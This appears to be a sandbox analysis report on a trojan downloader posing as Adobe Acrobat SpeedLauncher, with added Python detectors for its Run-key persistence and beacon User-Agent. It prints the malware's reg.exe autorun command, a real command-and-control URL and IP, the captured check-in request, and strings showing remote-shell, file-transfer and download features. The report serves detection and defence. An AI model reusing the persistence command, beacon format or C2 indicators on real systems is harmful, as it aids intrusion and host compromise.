Analysis Date: 2014-01-03 10:56:12
MD5: 55fb1409170c91740359d1d96364f17b
SHA1: eaf87e11c34f84932c567b85f2f004263e737e14

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4  sha1: 569a2df945e22f828a868388e0623aafe89122f7  size: 9728
Section .rdata  md5: 7df1e22dadbdcf85ea4f531e5aa7147e  sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f  size: 3072
Section .data   md5: 31d8808b923f3666213f87e82ea54529  sha1: 8baec1b4cb90f65617a4788201e533365fd17df5  size: 2560
Section .rsrc   md5: 9721dcc7e94f7acf151c715cd34476f4  sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3  size: 1024
Timestamp: 2009-02-05 07:14:01
Version info:
  LegalCopyright: Copyright Adobe Systems Incorporated 2004
  FileVersion: 8, 0, 0, 0
  CompanyName: Adobe Systems Incorporated
  Comments:
  ProductName: Adobe Acrobat
  ProductVersion: 8, 0, 0, 0
  FileDescription: Adobe Acrobat SpeedLauncher
  OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0
PEhash: 831bc4c3083b9d8f9e79455c8460b649f12c5905
AV (McAfee): Downloader.a!bkg
AV (AVG): Generic14.HE
AV (ClamAV): Trojan.Downloader-74679

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Process: reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates Mutex: GLOBAL\ADR32
Winsock URL: http://news.canadatvsite.com/worlda.html

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝
  C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00
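A detection check for the persistence recorded above, added here as an example and not part of the sandbox's own output: it parses `reg add` command lines out of process-creation events and flags writes to Run/RunOnce keys, rating them high when the autorun target sits in a user-writable profile directory, as reader_sl.exe does. The event records are constructed for the example; the entry with pid 1240 reuses the command line the sandbox logged, the others are invented controls. The binary's own format string in the Strings section, add "HKCU\%s" /v "%s" /d "%s" /f, shows the real command is quoted while the sandbox rendered it without quotes, so the parser accepts both forms.

```python
"""Flag reg.exe autorun writes in process-creation events (added example)."""
import re

# Hypothetical process-creation events, constructed for this example. Event 1240
# is the reg.exe command line the sandbox recorded; the others are invented
# controls (a benign query and an HKLM autorun that points into Program Files).
SAMPLE_EVENTS = [
    {"pid": 1001, "cmdline": r"C:\malware.exe"},
    {"pid": 1240, "cmdline": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
                             r"/v Adobe Reader Speed Launcher "
                             r"/d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f"},
    {"pid": 1301, "cmdline": r"reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\Tcpip /v Start"},
    {"pid": 1402, "cmdline": r'"C:\WINDOWS\system32\reg.exe" add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" '
                             r'/v "Adobe ARM" /d "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /f'},
]

HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE", "HKU": "HKEY_USERS"}
# "reg add <key> ..." with an optional path and optional quotes around the image and key.
REG_ADD_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+add\s+(?P<key>"[^"]*"|\S+)(?P<rest>.*)$', re.I)
# Split the remaining arguments only in front of a /switch, so unquoted values with spaces survive.
SWITCH_RE = re.compile(r"\s+(?=/[a-z]+\b)", re.I)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\(Application Data|AppData|Local Settings|Temp|Documents and Settings\\[^\\]+|Users\\[^\\]+)\\", re.I)


def _unquote(s):
    s = s.strip()
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def parse_reg_add(cmdline):
    """Parse a `reg add` command line into its key and switches, or return None.

    Accepts both the quoted form the binary builds (add "HKCU\\%s" /v "%s" /d "%s" /f,
    per its strings) and the unquoted rendering in the sandbox log.
    """
    m = REG_ADD_RE.match(cmdline)
    if not m:
        return None
    hive, sep, path = _unquote(m.group("key")).partition("\\")
    switches = {}
    for piece in SWITCH_RE.split(m.group("rest").strip()):
        if piece:
            name, _, value = piece.partition(" ")
            switches[name[1:].lower()] = _unquote(value) if value else None
    return {"key": HIVES.get(hive.upper(), hive) + sep + path, "switches": switches}


def assess_persistence(event):
    """Return a finding dict if the event writes an autorun value, else None."""
    parsed = parse_reg_add(event["cmdline"])
    if parsed is None or not RUN_KEY_RE.search(parsed["key"]):
        return None
    sw = parsed["switches"]
    target = sw.get("d") or ""
    in_profile = bool(USER_WRITABLE_RE.search(target))
    reasons = ["reg.exe writes a Run/RunOnce value"]
    if in_profile:
        reasons.append("autorun target is in a user-writable profile directory")
    if "f" in sw:
        reasons.append("/f overwrites any existing value without prompting")
    return {
        "pid": event["pid"],
        "key": parsed["key"],
        "value_name": sw.get("v"),
        "target": target,
        "severity": "high" if in_profile else "medium",
        "reasons": reasons,
    }


def scan(events):
    """Run assess_persistence over every event and keep the hits."""
    return [f for f in map(assess_persistence, events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["pid"], finding["key"], "->", finding["target"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The HKLM control is deliberately kept at medium: an autorun pointing into Program Files is how legitimate updaters register, so the distinguishing signal for this sample is the target path under the user's profile, not the Run key alone.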

Network Details:

DNS: news.canadatvsite.com
  Type: A
  Answer: 50.116.42.33
HTTP GET: http://news.canadatvsite.com/worlda.html
  User-Agent: 5.1 01:09 COMPUTER-XXXXXX\Administrator
Flows TCP: 192.168.1.1:1031 ➝ 50.116.42.33:80

Raw Pcap
0x00000000 (00000)   47455420 2f776f72 6c64612e 68746d6c   GET /worlda.html
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a2035 2e312030 313a3039   Agent: 5.1 01:09
0x00000030 (00048)   20434f4d 50555445 522d5858 58585858    COMPUTER-XXXXXX
0x00000040 (00064)   5c41646d 696e6973 74726174 6f720d0a   \Administrator..
0x00000050 (00080)   486f7374 3a206e65 77732e63 616e6164   Host: news.canad
0x00000060 (00096)   61747673 6974652e 636f6d0d 0a436163   atvsite.com..Cac
0x00000070 (00112)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000080 (00128)   61636865 0d0a0d0a                     ache....
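To check a capture against the network indicators above, the following added example (not part of the report) rebuilds the request bytes from the hex dump and extracts the fields the User-Agent leaks. The User-Agent layout is inferred from the format string %d.%d %02d:%02d %s\%s in the Strings section together with the GetVersionExA, GetLocalTime, GetComputerNameA and GetUserNameA imports: Windows major.minor version, local HH:MM, and COMPUTERNAME\username. The hex dump is copied from the report as printed; the benign control request is constructed.

```python
"""Rebuild the HTTP request from the hex dump and match the beacon's User-Agent (added example)."""
import re

# Copied verbatim from the "Raw Pcap" section of the report.
RAW_PCAP = r"""
0x00000000 (00000)   47455420 2f776f72 6c64612e 68746d6c   GET /worlda.html
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a2035 2e312030 313a3039   Agent: 5.1 01:09
0x00000030 (00048)   20434f4d 50555445 522d5858 58585858    COMPUTER-XXXXXX
0x00000040 (00064)   5c41646d 696e6973 74726174 6f720d0a   \Administrator..
0x00000050 (00080)   486f7374 3a206e65 77732e63 616e6164   Host: news.canad
0x00000060 (00096)   61747673 6974652e 636f6d0d 0a436163   atvsite.com..Cac
0x00000070 (00112)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000080 (00128)   61636865 0d0a0d0a                     ache....
"""

# Constructed control request with an ordinary browser User-Agent.
BENIGN_REQUEST = b"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.com\r\n\r\n"

# "offset (decimal)   up to four 8-hex-digit groups   ascii"; the ASCII column is never consumed
# because the hex part stops at the first group that is not hex digits.
HEXDUMP_LINE_RE = re.compile(
    r"^\s*0x[0-9a-f]+\s+\(\d+\)\s+(?P<hex>(?:[0-9a-f]{8}\s){0,3}[0-9a-f]{2,8})", re.I)

# "%d.%d %02d:%02d %s\%s" from the binary's strings: Windows major.minor, local HH:MM,
# COMPUTERNAME\username (inferred from the GetVersionExA/GetLocalTime/GetComputerNameA/
# GetUserNameA imports; an assumption of this example, not stated by the report).
BEACON_UA_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+) (?P<hh>\d{2}):(?P<mm>\d{2}) (?P<computer>[^\\]+)\\(?P<user>.+)$")


def decode_hexdump(dump):
    """Turn 'offset (dec)  hex hex hex hex  ascii' lines back into the raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEXDUMP_LINE_RE.match(line)
        if m:
            out += bytes.fromhex(m.group("hex").replace(" ", ""))
    return bytes(out)


def parse_http_request(raw):
    """Split a request into method, path, version, a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers, "body": body}


def match_beacon(request):
    """Return the host-fingerprint fields if the User-Agent follows the beacon format, else None."""
    m = BEACON_UA_RE.match(request["headers"].get("user-agent", ""))
    if not m:
        return None
    return {
        "os_version": f"{m['major']}.{m['minor']}",
        "local_time": f"{m['hh']}:{m['mm']}",
        "computer": m["computer"],
        "user": m["user"],
        "host": request["headers"].get("host"),
        "path": request["path"],
    }


if __name__ == "__main__":
    req = parse_http_request(decode_hexdump(RAW_PCAP))
    print(match_beacon(req))
    print(match_beacon(parse_http_request(BENIGN_REQUEST)))
```

The User-Agent regex is the useful part for a proxy or IDS rule: a version number, a clock time and a backslash-separated computer\user pair is not something a browser sends, so it matches this family's check-in regardless of the domain it is pointed at, while the Host and path fields tie a hit back to the specific indicators above.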


Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVj VV
PVVVWV
PVVVWVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
SSSh<W@
SSSVSS
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t<Ht2Ht(Ht
t:h(U@
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
W95hX@
WaitForSingleObject
whoami
width=
WININET.dll
WPh@R@
WriteConsoleInputA
WriteFile
_XcptFilter
Yt7@PV
YtEj/U
YYSSSSS
YYSSSVSS
YYSSVUS
YYt5j\
YYWWVh50@
YYWWVhp/@
ZbRich